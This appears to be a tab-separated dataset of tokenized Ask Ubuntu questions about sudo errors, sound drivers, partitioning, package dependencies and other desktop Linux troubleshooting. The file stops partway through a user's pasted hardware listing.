31904	ca n't perform regular sudo commands , have to use su now	i 'm an ubuntu newbie i just installed 10.10 and i do n't know what i did but now to perform actions that required sudo privileges ( open synaptic , mount device , run apt-get install , etc ) the os wo n't let me saying i dont have enough privileges , for example when i try to sudo apt-get install it tells me : myusername is not in the sudoers file . this incident will be reported . so i have to log in as su to do any on these things . i did n't have to do this before , i just used the regular root privileges but as i said i must have changed something un-intentionally . can anyone help me ? thanks in advance !
31908	how do i find patches in debian packages ?	how are the patches in debian/patches obtained ? is this diff -nurp folder/original folder1/new enough ?
31910	can i run several distros on one install ?	i 'm still a pretty fresh linux-user but i 'm having a look at the netbook-variants these days . in fact i am as of now running on one asus eee : jolicloud maverick netbook edition maverick pristine quimo 4 kids ( this question submitted via jolicloud . ) but i wonder if i 'm doing this all wrong . is it somehow possible to install ubuntu proper once and have different variants for different users ?
31913	how to perform a detailed and quick 3d performance test	i am wondering how to quickly test performance of my 3d graphics . since glxgears is not benchmark what should i use . also glxgears sometimes stuck at 60fps , you can not even compare before/after driver update ( e.g . adding xorg-edgers ppa ) . even glxgears does n't really work out of box . one possibility is screensavers , but you ca n't see fps . i am also not willing to install 600mb nexuiz , specially if i am running on live-cd . other 3d games are also very big ... unigine tests are too demanding for opensource drivers ( problems with too low opengl and probably texture compression ( s3tc ... ) ) . i would also like to test opengl 2.x extentions . how to quickly test your 3d performance ?
31918	deleting last few hours of zeitgeist history like in firefox ?	i want to open secret files on ubuntu natty and after my work delete the history of open files or any recorded activity during last : one hour three hours one day one week etc ... how can i do this , with gui or at least in terminal . thanks !
31919	how can i be notified of what music a friend is listening to ?	a friend and i both use ubuntu ( and windows when he 's at work ) . in order to keep tabs on what the other is listening to , is there a way notifications of the currently-playing track of another person over the net can be shown in ubuntu ? we currently use the clementine music player ( windows and ubuntu ) , but i 'd be open to alternatives if that ca n't be used . pidgin can be set to display the track in the status , of course , but an osd message would be great . perhaps using a web app in the middle like last.fm might facilitate this somehow ?
31920	problem with skype and usb headset	i have a problem trying to use my senheisser usb headset with skype , if i set my default output in my sound preferences to use my usb headset i hear everything in my pc through them including skype calls , no problem here , the issue is that i 'd like to hear skype class trough my headset while keeping the rest of my audio trough my speakes , is this possible ? i remember doing it on windows but there as soon as i plugged my headset skyped prompted me with a message asking me if i wanted to switch to them . i see there 's a option in skype within sound devices , but all it says is pulseaudio server ( local ) in all microphone , speakers and ringing select boxes with no other option . i 'm using ubuntu 10.10 , and it is a rather fresh install . is it possible to do this ? thanks in advance !
31922	problem installing ruby and gems	i just installed ruby using apt-get with the following command : sudo apt-get install ruby1.9.1-full but when i try to do sudo gem install ... it says that i have not installed gems and that i shoud get rubygems1.9.1 , i tried to do so but it said i already have it installed ( i believe they are included in ruby1.9.1 ) . i believe its a problem relating only to ruby because i never had issues installing anything through apt-get and then not getting it recognized . i tried login out , rebooting but no luck . i 'm on 10.10 by the way . does anyone know what could be wrong ? thanks in advance !
31923	gnome-panel sync between different systems ?	is there a way where i can get/sync all the content/shortcuts of which lies in my gnome panel to another computer ( laptop ) an back ? i 've has look a little to gconftool but it seems not really to copy all shortcuts to my laptop ! ! gconftool -- dump /apps/panel > backup.xml http : //ubuntuforums.org/showthread.php ? t=1091770
31928	where to put one-off computer-wide software folders ?	i am pretty new to linux so pardon the ignorance . i am installing an application ( a wiki server ) on my system but am not doing so through aptitude as i can only grab a tar.gz of the package . this application will really be used by all users so it does n't feel appropriate to install it in my home directory . where should i put the folder of files ? i would think that /usr/bin is the place , but i usually just see binary and linked files in there , which leads me to believe i should have the folder elsewhere and then drop a link to the executable in the /usr/bin folder . thanks !
31940	root_mismatch error after following faq directions	while using ubuntu one in 11.04 i am unable to change my account info . when i made the switch to 11.04 i forgot that i already had an ubuntu one account so , i made a new one . however , upon going through one of my email accounts i found my old ubuntu one login information . i then attempted to switch the account associated with my desktop to my first email . now , despite following the directions found at https : //wiki.ubuntu.com/ubuntuone/faq/whattodowhensyncdaemonsaysrootmismatch i continue to get the error `` file sync error . ( local and server roots are different ( root_mismatch ) ) '' . any help would be appreciated .
31942	gnome terminal primary selection and ctrl+c / ctrl+v clipboard sync needed	i was putty user . putty allows you to select the text which gets copied to clipboard . now on ubuntu , i am using terminal to connect host . i want to sync clipboard and terminal primary selection . so i want some thing like this 1 ) mouse selection of text in terminal updates clipboard and primary selection ( right now , it just updates primary selection ) 2 ) any text copy ( via ctrl + c ) outside terminal ( some other program ) should sync both . right now it just updates clipboard . e.g . text in gedit i found various programs like parcellite , glippy , pastie , diodon , clipit . all this programs are excellent but they have 1 annoying feature ( atlest for me ) . these programs updates both primary and clipboard even if i select any text outside terminal via mouse . i do not want this feature and i am not able to find any means to turn them off . for example 1 ) i select text in terminal via mouse 2 ) i select text in firefox via mouse < - this will update both clipboard and primary 3 ) i press shift + insert in terminal < - this will paste text from firefox where as i do not want this . mouse selected text outside terminal should not be reflected in clipboard friends do you have any pointers for me . how can i achieve this.i do not want to use putty in ubuntu as it has very bad ui .
31944	how can i import photos with tags from f-spot to shotwell	i have about 5k pictures with tags in f-spot , so you can imagine the time i spent setting the tags.. and since f-spot will not be supported anymore by ubuntu . as well as it has been replaced with shotwell.. i wonder how can i import those pictures from f-spot to shotwell ?
31946	how can i restore my computer to factory default using the command line ?	how can i use the command line to restore my computer to factory settings ?
31948	nvidia video card only works in recovery-mode	i am trying to understand why my nvidia video card only works in recovery mode did i miss something ?
31950	which is the best version of ubuntu to use on a tablet device ?	can ubuntu installed and use on xoom or ipad ? ( or other touch screen monitor like kiosk ) . is there a special build or package i need to install ?
31954	system is not booting even from windows bootable original cd	today i first installed windows 7 , then i installed ubuntu 10.04 . i installed ubuntu as side by side . then i restarted the system two times and both times i was able to login to ubuntu . then i thought i should test whether windows 7 is working or not , and i was able to login on windows 7 also . however , this time when i restarted , it crashed , and nothing was displayed on screen . then i used the ubuntu live cd and i think i made a mistake . i went to the terminal and wrote the command : sudo grub and then sudo apt-get install grub . now the system is not booting from both windows and the ubuntu cd . so now what should i do ? please reply asap . thanks
31956	vim/gedit delete words between character	i have a huge file with the entries like the one below : < option value= '' 201 '' > medical < /option > < option value= '' 203 '' > finance < /option > < option value= '' 205 '' > tax return < /option > -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- - i am trying to delete 'options ' entries in this file in one-shot so that file looks like the one below after editing : medical finance tax return -- -- -- -- -- -- -- -- -- -- i searched this in the google if i could do this with vim or gedit but did n't find any relevant to this ( do n't know searching with what keyword ) . anybody has any idea , please ?
31958	how can i set access to mounted truecrypt volumes , and how can i dismount them on logout ?	i have truecrypt setup to mount volumes when i log into my work account . however , when i log out and log in to another account , those volumes are still mounted and available on the other account . how can i set access to those volumes ? i do n't want all users to be able to access them once they 're mounted . ( they mounted at /media/volumename - do i just set permissions on the folder `` volumename '' before mounting ? ) how can i tell truecrypt to dismount them when i log out ?
31962	how do i get started with an ubuntu friendly gui framework ?	i have a few small scripts that i use for routine tasks . they require simple parameters to run . rather than running them from the terminal , i 'd prefer to pick something from the menu , be presented with a simple window with fields to input the parameters , click a `` go '' button and have the script run . i 've looked at descriptions of gtk+ , qt , etc , but i 'm not really sure where to start . i want : a really simple framework preferably with a python api that i can ideally create guis for programatically ( e.g . define 5 input objects in the code , and five fields appear in the window , nothing more required - this is so that i can add and remove parameters/fields on a whim ) it would be nice to have both text fields and dropdowns , but text fields will do to be able to provide simple feedback for validation and confirmation to be future proof against both unity and gnome shell a simple tutorial on creating an app with this framework ( again , preferably in python )
31963	how can i start transmission-daemon service before login ?	i want to run transmission-daemon as a service so that any user can log in and access the same instance of transmission ( via the browser or transmission remote gui ) . is this possible , and how can i do it ?
31967	âerror : no init found . try passing init=bootargâ error after power failure during boot	mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target file system does n't have /sbin/init no init found . try passing init= bootarg busybox v1.13.3 ( ubuntu 1:1.13.3-1ubuntu7 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands ( initramfs ) _ i tried passing init=bootarg in linux by editing the boot option in grub but it does n't help.. i tried to boot the live cd trying to get my files but as i mount the volume it goes forever ... how should i fix this ? edit : i tried using fsck but it says , filesystem mounted or opened exclusively by other program ? fsck : device or resource busy while trying to open /dev/sda1 are there any low level system utilities for linux that can be booted ( a little similar to msdos ' command.com ) so that i will use fsck under it to make sure that the device is not busy or in use ?
31973	apt-get : unmet dependencies	i wish to compile vim7.3 with python-interp enabled , which requires python-dev package . the problem is i have python-2.6.6-2ubuntu2 while python-dev requires python-2.6.6-2ubuntu1 . ( i do n't how i got it . http : //pastie.org/1706980 ) so , i have decided to downgrade python to -2ubuntu1 . but , apt-get puts another error message - reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : python : depends : python-minimal ( = 2.6.6-2ubuntu1 ) but 2.6.6-2ubuntu2 is to be installed e : broken packages so , how do i resolve this ? downgrade python-minimal first ? many packages will be removed then . also , sudo aptitude install python=2.6.6-2ubuntu1 outputs this . telling me to remove quite a few things . i am not sure this is the right way . p.s . google did n't help much . [ solved ] installing python-dev from maverick-updates worked .
31981	buzzing/static sound in headphones when volume is turned up	i can hear a buzzing/static sound in my headphones , especially when the volume is high . when i actually play any audio the buzzing/static sound goes away , so its not really a big problem . this problem only happens with the headphones on . i 'm running ubuntu 10.10 , how can i fix this ?
31983	lingot not detecting sound from microphone	i installed lingot ( guitar tuner- http : //freshmeat.net/projects/lingot/ ) on ubuntu but it does n't seem to be detecting the sounds from the microphone . i 'm using ubuntu 10.10 . thanks
31986	soundblaster gives only fizzing sound	since windows 7 utterly failed to recognise my built-in audio card , i figured i 'd just buy a soundblaster . at first everything was fine , it worked perfectly in both windows and linux . however , now , when i boot kubuntu , computer does n't produce any legible sound . whenever there should be any sound ( like on system start or with some notifications ) , speakers just fizz at the top of their voice . it works fine in windows , so it should n't be a hardware problem . what can be wrong ? i 'm running kubuntu 10.10 . also maybe i should mention that i bought and installed soundblaster after installing kubuntu .
31988	which edition fits my notebook ?	i have a new notebook : with 1.33g duo core 2g memory and 100g disk space which edition fits my computer ? netbook or desktop ?
31990	netgear *security alert* [ 58:84 : c7 ] almost on daily basis , should i do anything ?	my netgear wireless modem and router dg834pn has firewall installed and just recently i have been receiving almost daily 'security alerts ' stating ; tcp packet - source:58.218.199.147 destination:86.158.5.77 - [ port scan ] . they are all exactly the same source and destination . is ubuntu 10.10 secure or should i be doing something . i can obviously adjust the firewall but what and how , if necessary.. ? ? ? many thanks , bruce
31991	using the shift key in terminal	i am very new to linux , please excuse me if this is a very simple question and point me to the things i need to read . but i 've been unable to find an answer so far . in terminal , when i am trying to select the text in the command line by pressing shift + left or right , i get `` d '' and `` c '' typed instead . ( shift + up yields a and shift + down b ) . i 've read somewhere how to copy-paste using the mouse ; i can not imagine the terminal does n't provide for full keyboard control . note : ctrl + left or right moves the cursor around as it should , but ctrl + shift + left or right still types d and c. puzzled .
31994	how to diagnose & fix disk failing to unmount properly at shutdown ?	my ubuntu is consistently failing to properly unmount the disk when shutting down , which means that i have to boot twice each time ( i do n't reboot often , but it is an issue nonetheless ) . i 've got no idea why did it start doing this - how can i diagnose why is it doing this ?
31997	banshee `` encountered a fatal error '' on launch	see screenshot below , these problems had been diagnosed as i open my banshee .
32001	need proftpd to follow symbolic link	i have 2 folder : /var/www/project1/ /var/www/repository/module/ and i have this symbolic link : /var/www/project1/module/news = > /var/www/repository/module/news i know the target is outside the ftp root folder . but i want to make proftpd to be able to display & follow that symbolic link . the security is not a matter , we use that ftp on the local network for development purpose only . ps . : i also use gadmin-proftpd , and i installed everything by default , using apt-get install .
32007	how to find manually installed packages ?	i installed a plain ubuntu 10.10 on my computer and installed some software via apt-get . last week i managed to break everything and just started from scratch , and i need to reinstall my software . is there some way to create a list with all the packages that i have installed manually ? so that it would give me a list like „texlive , ... “ and not „texlive , texlive-dep1 , textlive-dep2 , ... “ and all the standard packages removed ? if i could somehow figure out which programs out of the regular install i have removed , that would be awesome too !
32008	how to selectively transition from safe mode to normal mode ?	this question is very closely related to what exactly is `` ubuntu desktop edition '' safe mode ? ( and i 'm having exactly the same problem ) , as the comment says the answer given may be confusing safe mode from the boot menu and safe mode from gdm . assuming we choose the `` ubuntu desktop edition ( safe mode ) '' from the login screen , firstly what does this not load in relation to not safe mode ? and secondly is there a way of finding out which modules differ between them , and then selectively starting them to find out which one is causing the problem ? effectively doing the transition from safe mode to normal mode step by step . thanks .
32011	`` system restart required '' flag , who sets it and why ? how to read it ?	when you log into ubuntu ( 10.04 in my case ) , you get to see this notice saying : *** system restart required *** now , i 'm wondering what system component sets it and why it gets set ? using ksplice i 'm aware that it can also be reset so the notice is not shown - also , since i use ksplice and after inspecting my logs there was no security upgrade of the kernel in some days , i 'm wondering why it is now shown . is the recent dbus update for 10.04 the reason ? last but not least : how do i read that `` flag '' , e.g . in a script ?
32012	how can i use the recovery console to start a session step by step ?	if you select `` recovery console '' at the gdm login screen , you are presented with a terminal screen in the top corner of the screen and the usual gdm background . i 'm trying to diagnose a problem which occurs straight after login where the machine hangs . which commands should i run from here and in what order to get myself into the state i would normally be in had i logged in the normal way ? thanks
32014	how do i format an external hdd for ubuntu and windows7 ?	i think that it is supposed to be fat32 , but , windows7 will not open it . is there another formatting option ?
32017	installing ubuntu 10.04 ( dual-boot ) , partition table is not being read	i had ubuntu 9.04 and i want to upgrade to 10.04 . it is dual-booted with windows vista . i decided to do a clean install from a live cd . the live cd was n't able to detect the partitions and instead just gave me the option of erasing the entire hard drive . i booted into windows and erased my ubuntu partition hoping that the live cd would recognise the free space . it does n't , and now i ca n't boot into windows either since i deleted the grub settings . so : how can i get my live cd to recognise the partitions ? how can i boot back into windows before this is fixed ? i am also restricted in that my only resource is the live cd ( and internet ) until the end of this weekend . thanks edit : output of sudo fdisk -l disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical / optimal io ) : 512 bytes / 512 bytes disk identifier : 0x90000000 device boot start end blocks id system /dev/sda1 17 1322 10485760 7 hpfs/ntfs /dev/sda2 * 1322 9200 63279092 7 hpfs/ntfs /dev/sda3 9201 14594 43320297+ f w95 ext 'd ( lba ) /dev/sda4 * 14267 14594 2620416 c w95 fat32 ( lba ) /dev/sda5 14054 14266 1710891 82 linux swap / solaris output of sudo parted -l error : ca n't have overlapping partitions . warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label after trying some other utilities ( eg lilo ) these are the new conditions of my partitions . new output of sudo sfdisk -d /dev/sda # partition table of /dev/sda unit : sectors /dev/sda1 : start= 258048 , size= 20971520 , id= 7 /dev/sda2 : start= 21229568 , size=126558184 , id= 7 , bootable /dev/sda3 : start=225761507 , size= 3421783 , id= f /dev/sda4 : start=229197824 , size= 5240832 , id= c , bootable /dev/sda5 : start=225761508 , size= 3421782 , id=82 new output of sudo fdisk -lu device boot start end blocks id system /dev/sda1 258048 21229567 10485760 7 hpfs/ntfs /dev/sda2 * 21229568 147787751 63279092 7 hpfs/ntfs /dev/sda3 225761507 229183289 1710891+ f w95 ext 'd ( lba ) /dev/sda4 * 229197824 234438655 2620416 c w95 fat32 ( lba ) /dev/sda5 225761508 229183289 1710891 82 linux swap / solaris new output of sudo parted -l partition table : msdos number start end size type file system flags 1 132mb 10.9gb 10.7gb primary ntfs 2 10.9gb 75.7gb 64.8gb primary ntfs boot 3 116gb 117gb 1752mb extended lba 5 116gb 117gb 1752mb logical linux-swap ( v1 ) 4 117gb 120gb 2683mb primary fat32 boot , lba warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label
32019	sound does n't work with intel 5 series/3400 chipset	who can help me find the audio driver . i got the following information after i ran sudo lshw and lspci lshw vun-k42jc description : notebook product : k42jc vendor : asustek computer inc. version : 1.0 serial : a8n0as67662035 width : 64 bits capabilities : smbios-2.6 dmi-2.6 vsyscall64 vsyscall32 configuration : boot=normal chassis=notebook uuid=8076f126-82b0-df81-2d0d-20cf3045c9fa *-core description : motherboard product : k42jc vendor : asustek computer inc. physical id : 0 version : 1.0 serial : bsn12345678901234567 slot : middle *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : k42jc.208 ( 07/21/2010 ) size : 64kib capacity : 1984kib capabilities : pci upgrade shadowing cdboot bootselect edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer acpi usb smartbattery biosbootspecification *-cpu description : cpu product : intel® core™ i5 cpu m 460 @ 2.53ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : intel® core™ i5 cpu m 460 @ 2.53gh serial : to be filled by o.e.m . slot : socket 989 size : 1199mhz capacity : 4ghz width : 64 bits clock : 133mhz capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp x86-64 constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt lahf_lm ida arat tpr_shadow vnmi flexpriority ept vpid cpufreq *-cache:0 description : l1 cache physical id : 5 slot : l1-cache size : 32kib capacity : 32kib capabilities : internal write-back unified *-cache:1 description : l2 cache physical id : 6 slot : l2-cache size : 256kib capacity : 256kib capabilities : internal varies unified *-cache:2 description : l3 cache physical id : 7 slot : l3-cache size : 3mib capacity : 3mib capabilities : internal varies unified *-memory description : system memory physical id : 41 slot : system board or motherboard size : 2gib *-bank:0 description : dimm [ empty ] product : [ empty ] vendor : [ empty ] physical id : 0 serial : [ empty ] slot : dimm0 *-bank:1 description : dimm [ empty ] product : [ empty ] vendor : [ empty ] physical id : 1 serial : [ empty ] slot : dimm1 *-bank:2 description : sodimm synchronous 1067 mhz ( 0.9 ns ) product : ad73i1b1672eg vendor : 04cb physical id : 2 serial : 00000000 slot : dimm2 size : 2gib width : 64 bits clock : 1067mhz ( 0.9ns ) *-bank:3 description : dimm [ empty ] product : [ empty ] vendor : [ empty ] physical id : 3 serial : [ empty ] slot : dimm3 *-pci:0 description : host bridge product : core processor dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 18 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 *-pci:0 description : pci bridge product : core processor pci express x16 root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 18 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport : d000 ( size=4096 ) memory : c0000000-d30fffff *-display description : vga compatible controller product : gt218 [ geforce 310m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : d2000000-d2ffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport : d000 ( size=128 ) memory : d3000000-d307ffff *-display description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 18 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : d3400000-d37fffff memory : b0000000-bfffffff ioport : e080 ( size=8 ) *-communication unclaimed description : communication controller product : 5 series/3400 series chipset heci controller vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 06 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : latency=0 resources : memory : d880a000-d880a00f *-usb:0 description : usb controller product : 5 series/3400 series chipset usb2 enhanced host controller vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 06 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:16 memory : d8808000-d88083ff *-multimedia description : audio device product : 5 series/3400 series chipset high definition audio vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 06 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:47 memory : d8800000-d8803fff *-pci:1 description : pci bridge product : 5 series/3400 series chipset pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 06 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 ioport : c000 ( size=4096 ) memory : d7400000-d87fffff ioport:7c000000 ( size=2097152 ) *-pci:2 description : pci bridge product : 5 series/3400 series chipset pci express root port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : 06 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:42 ioport : b000 ( size=4096 ) memory : d6000000-d73fffff ioport:7c200000 ( size=2097152 ) *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 74 : f0:6d:97 : fa:27 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=2.6.35-28-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : d6000000-d600ffff *-pci:3 description : pci bridge product : 5 series/3400 series chipset pci express root port 3 vendor : intel corporation physical id : 1c.2 bus info : pci @ 0000:00:1c.2 version : 06 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:43 ioport : a000 ( size=4096 ) memory : d4c00000-d5ffffff ioport:7c400000 ( size=2097152 ) *-pci:4 description : pci bridge product : 5 series/3400 series chipset pci express root port 6 vendor : intel corporation physical id : 1c.5 bus info : pci @ 0000:00:1c.5 version : 06 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:44 ioport:9000 ( size=4096 ) memory : d3800000-d4bfffff ioport:7c600000 ( size=2097152 ) *-generic:0 description : system peripheral product : sd/mmc host controller vendor : jmicron technology corp. physical id : 0 bus info : pci @ 0000:07:00.0 version : 80 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list configuration : driver=sdhci-pci latency=0 resources : irq:18 memory : d3805000-d38050ff *-generic:1 unclaimed description : sd host controller product : standard sd host controller vendor : jmicron technology corp. physical id : 0.2 bus info : pci @ 0000:07:00.2 version : 80 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi cap_list configuration : latency=0 resources : memory : d3804000-d38040ff *-network description : ethernet interface product : jmc250 pci express gigabit ethernet controller vendor : jmicron technology corp. physical id : 0.5 bus info : pci @ 0000:07:00.5 logical name : eth0 version : 03 serial : 20 : cf:30:45 : c9 : fa size : 100mb/s capacity : 1gb/s width : 32 bits clock : 33mhz capabilities : pm pciexpress msix msi bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=jme driverversion=1.0.6 duplex=full ip=10.1.50.41 latency=0 link=yes multicast=yes port=mii speed=100mb/s resources : irq:48 memory : d3800000-d3803fff ioport:9100 ( size=128 ) ioport:9000 ( size=256 ) *-usb:1 description : usb controller product : 5 series/3400 series chipset usb2 enhanced host controller vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 06 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : d8807000-d88073ff *-pci:5 description : pci bridge product : 82801 mobile pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : a6 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list *-isa description : isa bridge product : mobile 5 series chipset lpc interface controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 06 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-storage description : sata controller product : 5 series/3400 series chipset 4 port sata ahci controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 logical name : scsi0 logical name : scsi1 version : 06 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list emulated configuration : driver=ahci latency=0 resources : irq:45 ioport : e070 ( size=8 ) ioport : e060 ( size=4 ) ioport : e050 ( size=8 ) ioport : e040 ( size=4 ) ioport : e020 ( size=32 ) memory : d8806000-d88067ff *-disk description : ata disk product : st9500325as vendor : seagate physical id : 0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 0003 serial : 5vecrj0r size : 465gib ( 500gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=e0c5913d *-volume:0 description : windows fat volume vendor : msdos5.0 physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 version : fat32 serial : 3e5f-3a2b size : 19gib capacity : 19gib capabilities : primary hidden fat initialized configuration : fats=2 filesystem=fat *-volume:1 description : windows ntfs volume physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 logical name : /media/os version : 3.1 serial : 0a2938d9-aa3b-9243-bdc3-a0842ee3d7a0 size : 116gib capacity : 116gib capabilities : primary bootable ntfs initialized configuration : clustersize=4096 created=2011-01-07 08:30:45 filesystem=ntfs label=os mount.fstype=fuseblk mount.options=rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , default_permissions , allow_other , blksize=4096 state=mounted *-volume:2 description : extended partition physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 size : 329gib capacity : 329gib capabilities : primary extended partitioned partitioned : extended *-logicalvolume:0 description : hpfs/ntfs partition physical id : 5 logical name : /dev/sda5 logical name : /media/data capacity : 311gib configuration : mount.fstype=fuseblk mount.options=rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , default_permissions , allow_other , blksize=4096 state=mounted *-logicalvolume:1 description : linux filesystem partition physical id : 6 logical name : /dev/sda6 logical name : / capacity : 17gib configuration : mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , barrier=1 , data=ordered state=mounted *-logicalvolume:2 description : linux swap / solaris partition physical id : 7 logical name : /dev/sda7 capacity : 840mib capabilities : nofs *-cdrom description : dvd-ram writer product : dvd a ds8a4s vendor : slimtype physical id : 1 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/scd0 logical name : /dev/sr0 version : ja22 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-generic description : signal processing controller product : 5 series/3400 series chipset thermal subsystem vendor : intel corporation physical id : 1f.6 bus info : pci @ 0000:00:1f.6 version : 06 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=intel ips latency=0 resources : irq:18 memory : d8804000-d8804fff *-pci:1 description : host bridge product : core processor quickpath architecture generic non-core registers vendor : intel corporation physical id : 101 bus info : pci @ 0000 : ff:00.0 version : 05 width : 32 bits clock : 33mhz *-pci:2 description : host bridge product : core processor quickpath architecture system address decoder vendor : intel corporation physical id : 102 bus info : pci @ 0000 : ff:00.1 version : 05 width : 32 bits clock : 33mhz *-pci:3 description : host bridge product : core processor qpi link 0 vendor : intel corporation physical id : 103 bus info : pci @ 0000 : ff:02.0 version : 05 width : 32 bits clock : 33mhz *-pci:4 description : host bridge product : core processor qpi physical 0 vendor : intel corporation physical id : 104 bus info : pci @ 0000 : ff:02.1 version : 05 width : 32 bits clock : 33mhz *-pci:5 description : host bridge product : core processor reserved vendor : intel corporation physical id : 105 bus info : pci @ 0000 : ff:02.2 version : 05 width : 32 bits clock : 33mhz *-pci:6 description : host bridge product : core processor reserved vendor : intel corporation physical id : 106 bus info : pci @ 0000 : ff:02.3 version : 05 width : 32 bits clock : 33mhz lspci vun @ vun-k42jc : ~ $ lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 06 ) 00:1f.6 